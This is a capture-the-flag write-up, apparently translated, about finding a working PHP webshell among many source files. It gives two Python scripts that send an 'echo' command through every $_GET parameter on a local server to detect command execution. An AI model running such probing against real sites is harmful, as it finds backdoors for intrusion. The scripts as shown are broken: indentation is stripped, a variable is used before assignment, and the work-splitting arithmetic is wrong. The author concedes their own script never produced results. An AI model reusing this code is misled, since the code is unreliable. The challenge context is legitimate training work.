Obtain the source code at url/www.tar.gz according to the prompt
Just open a few and take
a look. There are many shells, but they are all unusable. You should find a shell that you can use. It seems that this question is to examine the ability to write code. I wrote it myself (python3)
import os
import re
import requests
from multiprocessing import Pool
filePath = "E:\phpstudy_pro\WWW\src"
url = "http://127.0.0.1:8003/"
# 读取当前目录的文件
def readFileName():
return os.listdir(filePath)
# 得到当前文件的get请求,post请求
def getReq(fileName):
f = filePath + "\\" + fileName
file = open(f, 'r')
file_data = file.read()
# get请求
rpGet = re.findall("_GET\['(.*?)\'", file_data)
# print(rpGet)
# post请求
rpPost = re.findall("_POST\['(.*?)\'", file_data)
# print(rpPost)
file.close()
# 请求验证
isSuccess(fileName, gets=rpGet, posts=rpPost)
return
def isSuccess(fileName, gets, posts):
url = url + fileName
print(fileName)
# 可以考虑开启线程
for get in gets:
if sendGet(get, url):
print(fileName + " " + get + " yes")
# for post in posts:
# if sendPost(post, url):
# print(fileName + " " + post + " yes")
return
shell = "echo 'this is'"
def sendGet(get, url):
url += "?" + get + "=" + shell
response = requests.get(url)
if "this is" in response.text:
print(url)
return True
return False
def sendPost(post, url):
data = {
post: shell}
response = requests.post(url, data)
if "this is" in response.text:
print(url)
return True
return False
if __name__ == '__main__':
pool = Pool(10)
pool.map(getReq, readFileName())
print("----start----")
pool.close() # 关闭进程池,关闭后po不再接受新的请求
pool.join() # 等待po中的所有子进程执行完成,必须放在close语句之后
print("-----end-----")
My own hasn’t come out. I don’t know what’s going on. I can’t use it if I don’t know what’s going on. However, I think it’s a problem with my computer. I only opened 3 processes and the cup was 100%. I originally said that I added it when I got the post request. A thread should be able to get a lot faster now, it looks the same to me
But the result must be able to come out. I ran directly and checked the file with shell.
Let's attach the code of the big guy (python2)
import os
import requests
from multiprocessing import Pool
path = "I:/phpStudy/PHPTutorial/WWW/src/"
files = os.listdir(path)
url = "http://localhost/src/"
def extract(f):
gets = []
with open(path+f, 'r') as f:
lines = f.readlines()
lines = [i.strip() for i in lines]
for line in lines:
if line.find("$_GET['") > 0:
start_pos = line.find("$_GET['") + len("$_GET['")
end_pos = line.find("'", start_pos)
gets.append(line[start_pos:end_pos])
return gets
def exp(start, end):
for i in range(start, end):
filename = files[i]
gets = extract(filename)
print "try: %s" % filename
for get in gets:
new_url = "%s%s?%s=%s" % (url, filename, get, 'echo "got it"')
r = requests.get(new_url)
if 'got it' in r.content:
print new_url
break
def main():
pool = Pool(processes=15)
for i in range(0, len(files), len(files)/15):
pool.apply_async(exp, (i, +len(files)/15,))
pool.close()
pool.join()
if __name__ == "__main__":
main()
Although I didn't run out completely with my own in the end, I still learned a lot. I watched python crawlers for two days, learned simple crawlers, watched regular rules, and watched the process pool. Still learned a lot.
Come on, Aoli!